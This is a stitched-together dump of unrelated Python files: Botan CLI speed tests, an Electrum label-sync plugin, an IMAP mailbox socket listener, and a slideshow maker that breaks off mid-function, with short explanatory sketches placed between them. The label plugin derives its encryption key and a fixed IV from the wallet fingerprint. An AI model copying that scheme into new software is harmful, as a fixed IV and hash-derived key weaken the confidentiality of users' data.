output) def cli_speed_tests(_tmp_dir): # pylint: disable=too-many-branches msec = 1 output = test_cli("speed", ["--msec=%d" % (msec), "--buf-size=64,512", "AES-128"], None).split('\n') if len(output) % 4 != 0: logging.error("Unexpected number of lines for AES-128 speed test") # pylint: disable=line-too-long format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "ChaCha20", "SHA-256", "HMAC(SHA-256)"], None).split('\n') # pylint: disable=line-too-long format_re = re.compile(r'^.* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "AES-128/GCM"], None).split('\n') format_re_ks = re.compile(r'^AES-128/GCM\(16\).* [0-9]+ key schedule/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') format_re_cipher = re.compile(r'^AES-128/GCM\(16\) .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re_ks.match(line) is None: if format_re_cipher.match(line) is None: logging.error('Unexpected line %s', line) pk_algos = ["ECDSA", "ECDH", "SM2", "ECKCDSA", "ECGDSA", "GOST-34.10", "DH", "DSA", "ElGamal", "Ed25519", "Curve25519", "NEWHOPE", "McEliece", "RSA", "XMSS"] output = test_cli("speed", ["--msec=%d" % (msec)] + pk_algos, None).split('\n') # ECDSA-secp256r1 106 keygen/sec; 9.35 ms/op 37489733 cycles/op (1 op in 9 ms) format_re = re.compile(r'^.* [0-9]+ ([A-Za-z ]+)/sec; 
[0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) # these all have a common output format math_ops = ['mp_mul', 'mp_div', 'mp_div10', 'modexp', 'random_prime', 'inverse_mod', 'rfc3394', 'fpe_fe1', 'ecdsa_recovery', 'ecc_init', 'poly_dbl', 'bn_redc', 'nistp_redc', 'ecc_mult', 'ecc_ops', 'os2ecp', 'primality_test', 'bcrypt', 'passhash9', 'argon2'] format_re = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)') for op in math_ops: output = test_cli("speed", ["--msec=%d" % (msec), op], None).split('\n') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "scrypt"], None).split('\n') format_re = re.compile(r'^scrypt-[0-9]+-[0-9]+-[0-9]+ \([0-9]+ MiB\) [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "RNG"], None).split('\n') # ChaCha_RNG generate buffer size 1024 bytes: 954.431 MiB/sec 4.01 cycles/byte (477.22 MiB in 500.00 ms) format_re = re.compile(r'^.* generate buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) # Entropy source rdseed output 128 bytes estimated entropy 0 in 0.02168 ms total samples 32 output = test_cli("speed", ["--msec=%d" % (msec), "entropy"], None).split('\n') format_re = re.compile(r'^Entropy source [_a-z0-9]+ output [0-9]+ bytes estimated entropy [0-9]+ in [0-9]+\.[0-9]+ ms .*total samples [0-9]+') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "--format=json", "AES-128"], None) json_blob = json.loads(output) if len(json_blob) < 2: logging.error("Unexpected size for JSON output") for b in json_blob: for field in ['algo', 'op', 'events', 'bps', 'buf_size', 'nanos']: if field not in b: logging.error('Missing field %s in JSON record %s' % (field, b)) def main(args=None): if args is None: args = sys.argv parser = optparse.OptionParser( formatter=optparse.IndentedHelpFormatter(max_help_position=50)) parser.add_option('--verbose', action='store_true', default=False) parser.add_option('--quiet', action='store_true', default=False) (options, args) = parser.parse_args(args) setup_logging(options) if len(args) < 2: logging.error("Usage: ./cli_tests.py path_to_botan_cli [test_regex]") return 1 if not os.access(args[1], os.X_OK): logging.error("Could not access/execute %s", args[1]) return 2 global CLI_PATH CLI_PATH = args[1] test_regex = None if len(args) == 3: try: test_regex = re.compile(args[2]) except re.error as e: logging.error("Invalid regex: %s", str(e)) return 1 start_time = time.time() test_fns = [ cli_argon2_tests, cli_asn1_tests, cli_base32_tests, cli_base58_tests, cli_base64_tests, cli_bcrypt_tests, cli_cc_enc_tests, cli_cert_issuance_tests, cli_compress_tests, cli_config_tests, cli_cpuid_tests, cli_dl_group_info_tests, cli_ec_group_info_tests, cli_entropy_tests, cli_factor_tests, cli_gen_dl_group_tests, cli_gen_prime_tests, cli_hash_tests, cli_help_tests, cli_hex_tests, cli_hmac_tests, cli_is_prime_tests, cli_key_tests, cli_xmss_sign_tests, cli_mod_inverse_tests, cli_pbkdf_tune_tests, cli_pk_encrypt_tests, 
cli_pk_workfactor_tests, cli_psk_db_tests, cli_rng_tests, cli_roughtime_check_tests, cli_roughtime_tests, cli_speed_tests, cli_timing_test_tests, cli_tls_ciphersuite_tests, cli_tls_client_hello_tests, cli_tls_http_server_tests, cli_tls_proxy_tests, cli_tls_socket_tests, cli_trust_root_tests, cli_tss_tests, cli_uuid_tests, cli_version_tests, ] for fn in test_fns: fn_name = fn.__name__ if test_regex is not None: if test_regex.search(fn_name) is None: continue logging.info("Running %s" % (fn_name)) start = time.time() tmp_dir = tempfile.mkdtemp(prefix='botan_cli_') try: fn(tmp_dir) except Exception as e: # pylint: disable=broad-except logging.error("Test %s threw exception: %s", fn_name, e) shutil.rmtree(tmp_dir) end = time.time() logging.debug("Ran %s in %.02f sec", fn_name, end-start) end_time = time.time() print("Ran %d tests with %d failures in %.02f seconds" % ( TESTS_RUN, TESTS_FAILED, end_time - start_time)) if TESTS_FAILED > 0: return 1 return 0 if __name__ == '__main__': sys.exit(main())
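For reference, a minimal invocation sketch for the test runner above, based on the usage string printed by main(); the CLI binary path and the regex are placeholders.

# python3 cli_tests.py /path/to/botan             # run every registered test function
# python3 cli_tests.py /path/to/botan roughtime   # run only functions whose name matches the regex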
labels.py
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64

import electrum_deeponion as electrum
from electrum_deeponion.plugins import BasePlugin, hook
from electrum_deeponion.i18n import _


class LabelsPlugin(BasePlugin):

    def __init__(self, parent, config, name):
        BasePlugin.__init__(self, parent, config, name)
        self.target_host = 'labels.electrum.org'
        self.wallets = {}

    def encode(self, wallet, msg):
        password, iv, wallet_id = self.wallets[wallet]
        encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv, msg.encode('utf8'))
        return base64.b64encode(encrypted).decode()

    def decode(self, wallet, message):
        password, iv, wallet_id = self.wallets[wallet]
        decoded = base64.b64decode(message)
        decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
        return decrypted.decode('utf8')

    def get_nonce(self, wallet):
        # nonce is the nonce to be used with the next change
        nonce = wallet.storage.get('wallet_nonce')
        if nonce is None:
            nonce = 1
            self.set_nonce(wallet, nonce)
        return nonce

    def set_nonce(self, wallet, nonce):
        self.print_error("set", wallet.basename(), "nonce to", nonce)
        wallet.storage.put("wallet_nonce", nonce)

    @hook
    def set_label(self, wallet, item, label):
        if wallet not in self.wallets:
            return
        if not item:
            return
        nonce = self.get_nonce(wallet)
        wallet_id = self.wallets[wallet][2]
        bundle = {"walletId": wallet_id,
                  "walletNonce": nonce,
                  "externalId": self.encode(wallet, item),
                  "encryptedLabel": self.encode(wallet, label)}
        t = threading.Thread(target=self.do_request_safe,
                             args=["POST", "/label", False, bundle])
        t.setDaemon(True)
        t.start()
        # Caller will write the wallet
        self.set_nonce(wallet, nonce + 1)

    def do_request(self, method, url="/labels", is_batch=False, data=None):
        url = 'https://' + self.target_host + url
        kwargs = {'headers': {}}
        if method == 'GET' and data:
            kwargs['params'] = data
        elif method == 'POST' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['Content-Type'] = 'application/json'
        response = requests.request(method, url, **kwargs)
        if response.status_code != 200:
            raise Exception(response.status_code, response.text)
        response = response.json()
        if "error" in response:
            raise Exception(response["error"])
        return response

    def do_request_safe(self, *args, **kwargs):
        try:
            self.do_request(*args, **kwargs)
        except BaseException as e:
            #traceback.print_exc(file=sys.stderr)
            self.print_error('error doing request')

    def push_thread(self, wallet):
        wallet_data = self.wallets.get(wallet, None)
        if not wallet_data:
            raise Exception('Wallet {} not loaded'.format(wallet))
        wallet_id = wallet_data[2]
        bundle = {"labels": [],
                  "walletId": wallet_id,
                  "walletNonce": self.get_nonce(wallet)}
        for key, value in wallet.labels.items():
            try:
                encoded_key = self.encode(wallet, key)
                encoded_value = self.encode(wallet, value)
            except:
                self.print_error('cannot encode', repr(key), repr(value))
                continue
            bundle["labels"].append({'encryptedLabel': encoded_value,
                                     'externalId': encoded_key})
        self.do_request("POST", "/labels", True, bundle)

    def pull_thread(self, wallet, force):
        wallet_data = self.wallets.get(wallet, None)
        if not wallet_data:
            raise Exception('Wallet {} not loaded'.format(wallet))
        wallet_id = wallet_data[2]
        nonce = 1 if force else self.get_nonce(wallet) - 1
        self.print_error("asking for labels since nonce", nonce)
        response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id)))
        if response["labels"] is None:
            self.print_error('no new labels')
            return
        result = {}
        for label in response["labels"]:
            try:
                key = self.decode(wallet, label["externalId"])
                value = self.decode(wallet, label["encryptedLabel"])
            except:
                continue
            try:
                json.dumps(key)
                json.dumps(value)
            except:
                self.print_error('error: no json', key)
                continue
            result[key] = value
        for key, value in result.items():
            if force or not wallet.labels.get(key):
                wallet.labels[key] = value
        self.print_error("received %d labels" % len(response))
        # do not write to disk because we're in a daemon thread
        wallet.storage.put('labels', wallet.labels)
        self.set_nonce(wallet, response["nonce"] + 1)
        self.on_pulled(wallet)

    def pull_thread_safe(self, wallet, force):
        try:
            self.pull_thread(wallet, force)
        except BaseException as e:
            # traceback.print_exc(file=sys.stderr)
            self.print_error('could not retrieve labels')

    def start_wallet(self, wallet):
        nonce = self.get_nonce(wallet)
        self.print_error("wallet", wallet.basename(), "nonce is", nonce)
        mpk = wallet.get_fingerprint()
        if not mpk:
            return
        mpk = mpk.encode('ascii')
        password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
        iv = hashlib.sha256(password).digest()[:16]
        wallet_id = hashlib.sha256(mpk).hexdigest()
        self.wallets[wallet] = (password, iv, wallet_id)
        # If there is an auth token we can try to actually start syncing
        t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
        t.setDaemon(True)
        t.start()

    def stop_wallet(self, wallet):
        self.wallets.pop(wallet, None)
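A minimal sketch (standard library only) of the per-wallet credential derivation performed in start_wallet() above; the mpk value is a placeholder, and the AES encryption step itself (electrum.bitcoin.aes_encrypt_with_iv) is deliberately not reproduced here.

import hashlib

mpk = b'xpub-placeholder'                                      # wallet.get_fingerprint(), ASCII-encoded
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')  # symmetric key material for label encryption
iv = hashlib.sha256(password).digest()[:16]                    # fixed IV derived from the key
wallet_id = hashlib.sha256(mpk).hexdigest()                    # identifier sent to the labels server
print(wallet_id)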
mailbox_listener.py
from typing import Dict, Any, Tuple, Optional
import contextlib
import email
import os
import threading

import imapclient.response_types

from .mailbox_tasks import MailboxTasks
from .packet import Packet, PlainPacket, SecurePacket
from ..credential import Credential
from . import socket_context, imapclient


class MailboxListener(MailboxTasks):
    __store: imapclient.IMAPClient
    __listener: imapclient.IMAPClient
    __mutex_listener: threading.RLock
    __selfpipe: Tuple[int, int]
    __thread_listener: threading.Thread
    __closed: bool = False

    @staticmethod
    def __init_imap(credential: Credential) -> imapclient.IMAPClient:
        imap = imapclient.IMAPClient(credential.host, credential.port, ssl=True, use_uid=True)
        imap.login(credential.username, credential.password)
        imap.select_folder('INBOX')
        return imap

    def __init__(self, imap: Credential, **kwargs):
        super().__init__(**kwargs)
        self.__store = self.__init_imap(imap)
        self.__listener = self.__init_imap(imap)
        self.__mutex_listener = threading.RLock()
        self.__selfpipe = os.pipe()
        self.__thread_listener = threading.Thread(target=self.__listen)
        self.__thread_listener.start()

    def join(self):
        super().join()
        self.__thread_listener.join()

    def close(self):
        with self._mutex:
            if self.__closed:
                return
            self.__closed = True
        super().close()
        os.close(self.__selfpipe[1])
        with self.__mutex_listener:
            self.__store.logout()
            self.__listener.logout()
        self.join()

    def __listen(self):
        with self.__mutex_listener:
            self.__listener.idle()
            self.__check_new_packets()
            while True:
                responses = self.__listener.idle_check(selfpipe=self.__selfpipe[0])
                if responses is None:  # selfpipe triggered
                    self.__listener.idle_done()
                    return
                if any(response[1] == b'EXISTS' for response in responses):
                    self.__check_new_packets()

    # TODO: handle exception
    def __check_new_packets(self):
        self.__store.noop()
        uids = self.__store.search('UNSEEN')
        messages = self.__store.fetch(uids, ['BODY.PEEK[]'])
        seens = []
        for uid, message in messages.items():
            if self.__try_process_packet(message):
                seens.append(uid)
        if seens:
            self.__store.add_flags(seens, [imapclient.SEEN])

    def _process_packet_connected(self, sid: int, context: socket_context.Connected, packet: Packet):
        secure = isinstance(context, socket_context.SecureConnected)
        with context.cv:
            if secure:
                packet: SecurePacket
                context: socket_context.SecureConnected
                packet = packet.decrypt(context.ratchet, context.xeddsa)
            packet: PlainPacket
            for ack_seq, ack_attempt in packet.acks:
                self.__process_ack(context, ack_seq, ack_attempt)
            if packet.seq != -1 and packet.seq >= context.recv_cursor[0]:
                # no action for pure ack and duplicated packets
                context.pending_remote[packet.seq] = packet.payload
                context.to_ack.add((packet.seq, packet.attempt))
                self._schedule_ack(sid, context)
                seq, off = context.recv_cursor
                while context.pending_remote.get(seq) == b'':
                    del context.pending_remote[seq]
                    seq += 1
                    off = 0
                context.recv_cursor = seq, off
                if context.pending_remote.get(seq):
                    self._socket_update_ready_status(sid, 'read', True)
            elif secure and packet.seq == 0:
                # handshake response
                del context.attempts[0]
                del context.pending_local[0]
                context.syn_seq = None
            context.cv.notify_all()
        return True

    def __try_process_packet_connected(self, packet: Packet, secure: bool) -> bool:
        with self._mutex:
            sid = self._connected_sockets.get((packet.to, packet.from_))
            try:
                context: socket_context.Connected = self._socket_check_status(sid, socket_context.Connected)
            except Exception:
                return False
            if secure != isinstance(context, socket_context.SecureConnected):
                return False
            return self._process_packet_connected(sid, context, packet)

    def __try_process_packet_listening(self, packet: Packet, secure: bool) -> bool:
        with self._mutex:
            sid = next((sid for sid, listening_endpoint in self._listening_sockets.items()
                        if listening_endpoint.matches(packet.to)), None)
            try:
                context: socket_context.Listening = self._socket_check_status(sid, socket_context.Listening)
            except Exception:
                return False
            with context.cv:
                conn_sid = context.connected_sockets.get((packet.to, packet.from_))
                if conn_sid is not None:  # existing pending connection
                    conn_context = context.sockets[conn_sid]
                    if secure != isinstance(conn_context, socket_context.SecureConnected):
                        return False
                    conn_context.pending_packets.append(packet)
                elif packet.is_syn:  # new connection
                    conn_sid = self._socket_allocate_id()
                    context.queue.append(conn_sid)
                    context.connected_sockets[(packet.to, packet.from_)] = conn_sid
                    self._socket_update_ready_status(sid, 'read', True)
                    context.cv.notify_all()
                    if secure:
                        packet: SecurePacket
                        conn_context = socket_context.SecureConnected(packet.to, packet.from_)
                    else:
                        conn_context = socket_context.Connected(packet.to, packet.from_)
                    conn_context.pending_packets.append(packet)
                    context.sockets[conn_sid] = conn_context
                else:
                    return False
        return True

    @staticmethod
    def __try_parse_packet(msg: email.message.Message) -> Optional[Tuple[Packet, bool]]:
        with contextlib.suppress(Exception):
            return PlainPacket.from_message(msg), False
        with contextlib.suppress(Exception):
            return SecurePacket.from_message(msg), True
        return None

    def __try_process_packet(self, message: Dict[bytes, Any]) -> bool:
        msg = email.message_from_bytes(message[b'BODY[]'])
        ret = self.__try_parse_packet(msg)
        return ret and bool(self.__try_process_packet_connected(*ret)
                            or self.__try_process_packet_listening(*ret))

    # TODO: check the seq range of packet
    # TODO: check if duplicated attempts of a packet are same
    def __process_ack(self, context: socket_context.Connected, seq: int, attempt: int):
        total_attempts = context.attempts.get(seq)
        if total_attempts is None:  # duplicated ack
            return
        del context.pending_local[seq]
        context.to_ack -= context.sent_acks[(seq, attempt)]
        for i in range(total_attempts):
            del context.sent_acks[(seq, i)]
        del context.attempts[seq]
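A self-contained sketch of the self-pipe shutdown pattern that MailboxListener relies on (os.pipe() in __init__, idle_check(selfpipe=...) in __listen, closing the write end in close()); the names and the select-based wait below are illustrative and not taken from the vendored imapclient.

import os
import select
import threading
import time

r, w = os.pipe()

def listen():
    # Blocks until the read end becomes readable; closing the write end
    # produces EOF on the read end, which we treat as the shutdown signal.
    select.select([r], [], [])
    print('listener woken, shutting down')

t = threading.Thread(target=listen)
t.start()
time.sleep(0.1)
os.close(w)   # analogous to close() closing __selfpipe[1]
t.join()
os.close(r)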
ffmagick.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Simple slideshow maker. The following external tools are needed: - ffmpeg - imagemagick (convert, mogrify, montage) - mkvtoolnix (mkvmerge) """ import multiprocessing as mp import os import shutil import subprocess import sys import time from argparse import ArgumentParser from datetime import date from imghdr import what from itertools import cycle, tee from random import randint from tempfile import gettempdir from threading import Thread from xml.sax.saxutils import escape __version__ = '0.1' DEFAULT_FONT = 'Cooper-Black' if os.name == 'nt' else 'DejaVu-Sans-Book' _P = cycle(r'\|/-') _exe = '.exe' if os.name == 'nt' else '' EXT = ('tiff', 'jpeg', 'bmp', 'png') AUDIO_EXT = ('.wav', '.ogg', '.mp3', '.m4a', '.aac') EXECUTABLES = { 'ffmpeg': 'ffmpeg', 'convert': 'convert', 'mogrify': 'mogrify', 'montage': 'montage', 'mkvmerge': 'mkvmerge', } TAGFILE_CONTENT = """\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Tags SYSTEM "matroskatags.dtd"> <Tags> <Tag> <Simple> <Name>DESCRIPTION</Name> <String>{epilog}</String> </Simple> <Simple> <Name>DATE_RELEASED</Name> <String>{date}</String> </Simple> <Simple> <Name>COMMENT</Name> <String>Created with ffmagick slideshow maker.</String> </Simple> <Simple> <Name>COPYRIGHT</Name> <String>{author}</String> </Simple> </Tag> </Tags> """ BUILDFILE_CONTENT = """\ # -*- coding: utf-8 -*- from ffmagick import slideshow, recurse, recurse_audio # Put your images and/or image directories here. If you have subfolders, # which should be included, use the `recurse` function provided. # Example: IMAGES = [ # '/home/user/mypic.jpg', # recurse('/home/user/fotos'), # '/home/user/myfolder', # ] # On Windows use raw strings (r'C:\\Users\\user\\pictures') or forward # slashes ('C:/Users/user/pictures'). IMAGES = [] # Put your audio files and/or directories here. If you have subfolders, # which should be included, use the `recurse_audio` function provided. # Example: AUDIO = [ # '/home/user/song.mp3', # recurse_audio('/home/user/music'), # '/home/user/audiofolder' # ] # On Windows use raw strings (r'C:\\Users\\user\\music') or forward # slashes ('C:/Users/user/music'). AUDIO = [] # Output profile for your show. # Available profiles: DVD (720x576, 30Hz) # 720p (1280x720, 60Hz) # 1080p (1920x1080, 60Hz) # UHD (3840x2160, 60Hz) # 4k (4096x2304, 60Hz) PROFILE = '1080p' # Time to display each image in seconds. IMAGE_DURATION = 5 # Time for the transition between two images in seconds. TRANSITION_DURATION = 1 # Set your font here. Run `python ffmagick.py list_fonts` for a list of # supported fonts of your platform. The best way is to give an absolute # path to a .ttf file here. System fonts can be used without path. # On Windows use raw strings (r'C:\\windows\\fonts\\coopbl.ttf') or # forward slashes ('C:/windows/fonts/coopbl.ttf'). FONT = '{font}' # Title for your slideshow TITLE = '' # Author of the slideshow AUTHOR = '' # Text shown at the end of the show. Use `\\n` as newline even on Windows. EPILOG = '' # Background color for text and around the images after resizing. BACKGROUND = 'black' # Color for title and epilog text. TEXTCOLOR = 'white' # Working directory for temporary files (for a show with 4 pictures about # 120MB free space is needed) # If None (the default) your systems temporary directory is used. WORKDIR = None # Mapping for the needed external programs if not in your PATH. 
EXECUTABLES = {{ 'convert': r'convert{exe}', 'montage': r'montage{exe}', 'mogrify': r'mogrify{exe}', 'ffmpeg': r'ffmpeg{exe}', 'mkvmerge': r'mkvmerge{exe}', }} # Remove all temporary files after slideshow is finished. # If set to True, the needed HD space is much less. Images then will be # removed right after small movie creation. REMOVE_TEMPFILES = True # Filename for your created slideshow. OUTPUT = r'{out}' if __name__ == '__main__': slideshow( IMAGES, AUDIO, remove_tempfiles=REMOVE_TEMPFILES, output=OUTPUT, profile=PROFILE, image_duration=IMAGE_DURATION, transition_duration=TRANSITION_DURATION, font=FONT, title=TITLE, author=AUTHOR, epilog=EPILOG, background=BACKGROUND, textcolor=TEXTCOLOR, workdir=WORKDIR, executables=EXECUTABLES, ) """.format(font=DEFAULT_FONT, exe=_exe, out=os.path.join(os.getcwd(), 'slideshow.mkv')) class Profile: def __init__(self, width, height, fps, fontsize=None): self.width = width self.height = height self.fps = fps self.fontsize = fontsize @property def size(self): return (self.width, self.height) @property def montage_width(self): return self.width // 2 @property def montage_height(self): return self.height // 2 @property def montage_size(self): return (self.montage_width, self.montage_height) PROFILES = { 'dvd': Profile(720, 576, 30, 48), '720p': Profile(1280, 720, 60, 80), '1080p': Profile(1920, 1080, 60, 80), 'uhd': Profile(3840, 2160, 60, 80), '4k': Profile(4096, 2304, 60, 80), } class Base: def __init__(self, workdir, executables, outfile=None): workdir = workdir or gettempdir() _name = 'ffmagick-{}-'.format(self.__class__.__name__) self.tmp = _get_name(workdir, _name) os.mkdir(self.tmp) self.exe = EXECUTABLES.copy() if executables: self.exe.update(executables) self.outfile = outfile self.process_time = None self._automate = [] def __iter__(self): start = time.time() for desc, func in self._automate: _start = time.time() func() yield desc, time.time() - _start self.process_time = time.time() - start def cleanup(self): shutil.rmtree(self.tmp) class VideoBuilder(Base): def __init__(self, pictures, profile=PROFILES['1080p'], title='', background='black', textcolor='white', font=DEFAULT_FONT, workdir=None, author='', epilog='', executables=None, image_duration=5, transition_duration=1, remove_tempfiles=True): Base.__init__(self, workdir, executables) self.source_pictures = _get_pictures(pictures) self.pictures = [] self.first = None self.last = None self._last_num = None self.anim_nums = [] self.profile = profile self.title = title self.background = background self.textcolor = textcolor self.font = font self.author = author self.epilog = epilog self.image_duration = image_duration self.transition_duration = transition_duration self.remove_tempfiles = remove_tempfiles self.dirs = dict( pics=os.path.join(self.tmp, 'pictures'), anim_pics=os.path.join(self.tmp, 'animation_pictures'), movs=os.path.join(self.tmp, 'movies'), ) for d in self.dirs.values(): os.mkdir(d) self._automate = ( ('Copied source files to workdir', self.copy_source_files), ('Created first picture with fade-in', self.create_first_picture), ('Created last picture with fade-out', self.create_last_picture), ('Resized pictures according to profile', self.resize_pictures), ('Created animation pictures', self.create_anim_pictures), # ('Created movies for pictures', self.create_small_movies), # ('Created movies for transitions', # self.create_transition_movies), ('Created small movies', self.create_movies), ('Created video only MKV file', self.create_video_only_mkv), ) def copy_source_files(self): 
i = 3 for pic in self.source_pictures: dest = os.path.join(self.dirs['pics'], 'pic-{:>06d}.jpg'.format(i)) cmd = [self.exe['convert'], pic, '-auto-orient', dest] subprocess.check_call(cmd) self.pictures.append(dest) i += 2 self._last_num = i def create_first_picture(self): if len(self.pictures) < 4: raise ValueError('You must at least have 4 pictures in your show!') nums = _get_sample_numbers(len(self.pictures)) pics = [self.pictures[x] for x in nums] _out = os.path.join(self.dirs['pics'], 'pic-000001.jpg') if self.title: out = os.path.join(self.tmp, 'title_raw.jpg') else: out = _out cmd = [self.exe['montage'], '-tile', '2x'] cmd.extend(pics) cmd.extend([ '-geometry', '{}x{}+10+50'.format( self.profile.montage_width, self.profile.montage_height ), '-background', self.background, out ]) subprocess.check_call(cmd) if self.title: cmd = [self.exe['convert'], out, '-gravity', 'center', '-font', self.font, '-pointsize', str(self.profile.fontsize), '-fill', self.textcolor, '-draw', "text 0,0 '{}'".format(self.title), _out] subprocess.check_call(cmd) self.first = _out def create_last_picture(self): w, h = self.profile.size text = [] now = date.today() if not self.author and not self.epilog: text.append('Build with ffmagick {}'.format(now.year)) else: if self.author: text.append('\xa9 {} {}'.format(now.year, self.author)) if self.epilog: text.append(self.epilog) out = os.path.join(self.dirs['pics'], 'pic-{:>06d}.jpg'.format(self._last_num)) cmd = [self.exe['convert'], '-size', '{}x{}'.format(w, h), '-background', self.background, '-fill', self.textcolor, '-font', self.font, '-pointsize', str(self.profile.fontsize), '-gravity', 'center', 'label:{}'.format('\n'.join(text)), out] subprocess.check_call(cmd) self.last = out def resize_pictures(self): # start = time.time() size = '{}x{}'.format(*self.profile.size) pics = [self.first] + self.pictures + [self.last] for pic in pics: cmd = [self.exe['mogrify'], '-resize', size, '-background', 'black', '-gravity', 'center', '-extent', size, pic] subprocess.check_call(cmd) def create_anim_pictures(self): pics = [self.first] + self.pictures + [self.last] i = 2 frames = self.profile.fps * self.transition_duration - 2 for pic1, pic2 in _pairwise(pics): d = os.path.join(self.dirs['anim_pics'], 'morph-{:>06d}'.format(i)) full = os.path.join(d, '%03d.jpg') os.mkdir(d) cmd = [self.exe['convert'], pic1, pic2, '-morph', str(frames), full] self.anim_nums.append(i) subprocess.check_call(cmd) i += 2 def create_small_movies(self): self._create_first_movie() # length = len(self.pictures) for pic in self.pictures: _name = os.path.basename(pic) name, _ = os.path.splitext(_name) out = os.path.join(self.dirs['movs'], 'mov-{}.mp4'.format(name)) cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', pic, '-c:v', 'libx264', '-t', str(self.image_duration), '-r', str(self.profile.fps), '-pix_fmt', 'yuv420p', out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) if self.remove_tempfiles: os.remove(pic) self._create_last_movie() def create_transition_movies(self): anims = os.listdir(self.dirs['anim_pics']) anims.sort() for folder in anims: num = folder.split('-')[1] inp = os.path.join(self.dirs['anim_pics'], folder, '%03d.jpg') out = os.path.join(self.dirs['movs'], 'mov-pic-{}.mp4'.format(num)) cmd = [self.exe['ffmpeg'], '-r', str(self.profile.fps), '-i', inp, '-c:v', 'libx264', '-vf', 'fps={},format=yuv420p'.format(self.profile.fps), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) if self.remove_tempfiles: shutil.rmtree(os.path.join(self.dirs['anim_pics'], folder)) def 
create_movies(self): p = Thread(target=self.create_small_movies) p.start() self.create_transition_movies() p.join() def create_video_only_mkv(self): opts = os.path.join(self.tmp, 'video_only.txt') out = os.path.join(self.tmp, 'video_only.mkv') files = [os.path.join(self.dirs['movs'], x) for x in os.listdir(self.dirs['movs'])] files.sort() tags_file = self._create_tags_file() with open(opts, 'w', encoding='utf-8') as fp: fp.write('-o\n{}\n'.format(out.replace('\\', '/'))) if self.title: fp.write('--title\n') fp.write('{}\n'.format(self.title)) fp.write('--global-tags\n') fp.write('{}\n\n'.format(tags_file.replace('\\', '/'))) fp.write('{}\n'.format(files[0].replace('\\', '/'))) for f in files[1:]: fp.write('+{}\n'.format(f.replace('\\', '/'))) cmd = [self.exe['mkvmerge'], '@{}'.format(opts)] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.outfile = out def _create_tags_file(self): out = os.path.join(self.tmp, 'tags.xml') dt = date.today() text = TAGFILE_CONTENT.format( epilog=escape(self.epilog), author=escape(self.author), date=dt.strftime('%Y-%m-%d') ) with open(out, 'w', encoding='utf-8') as fp: fp.write(text) return out def _create_first_movie(self): duration = self.image_duration + 2 tmp_out = os.path.join(self.tmp, 'first.mp4') cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', self.first, '-c:v', 'libx264', '-t', str(duration), '-r', str(self.profile.fps), '-y', '-pix_fmt', 'yuv420p', tmp_out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) out = os.path.join(self.dirs['movs'], 'mov-pic-000001.mp4') cmd = [self.exe['ffmpeg'], '-i', tmp_out, '-y', '-vf', 'fade=in:0:{}'.format(self.profile.fps * 2), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) def _create_last_movie(self): duration = self.image_duration + 2 begin = duration * self.profile.fps - 2 * self.profile.fps tmp_out = os.path.join(self.tmp, 'last.mp4') cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', self.last, '-c:v', 'libx264', '-t', str(duration), '-r', str(self.profile.fps), '-y', '-pix_fmt', 'yuv420p', tmp_out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) _name = os.path.basename(self.last) name, _ = os.path.splitext(_name) out = os.path.join(self.dirs['movs'], 'mov-{}.mp4'.format(name)) cmd = [self.exe['ffmpeg'], '-i', tmp_out, '-y', '-vf', 'fade=out:{}:{}'.format(begin, self.profile.fps * 2), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) class AudioBuilder(Base): def __init__(self, audio_files, workdir=None, executables=None): Base.__init__(self, workdir, executables) self.audio_files = _get_audio(audio_files) self.aac_files = [] self._automate = ( ('Transcoded audio files to AAC', self.transcode), ('Created audio only MKV file', self.create_audio_only_mkv), ) def transcode(self): for n, f in enumerate(self.audio_files, 1): out = os.path.join(self.tmp, 'audio-{:>03d}.aac'.format(n)) if f.lower().endswith('.aac') or f.lower().endswith('.m4a'): shutil.copy(f, out) else: 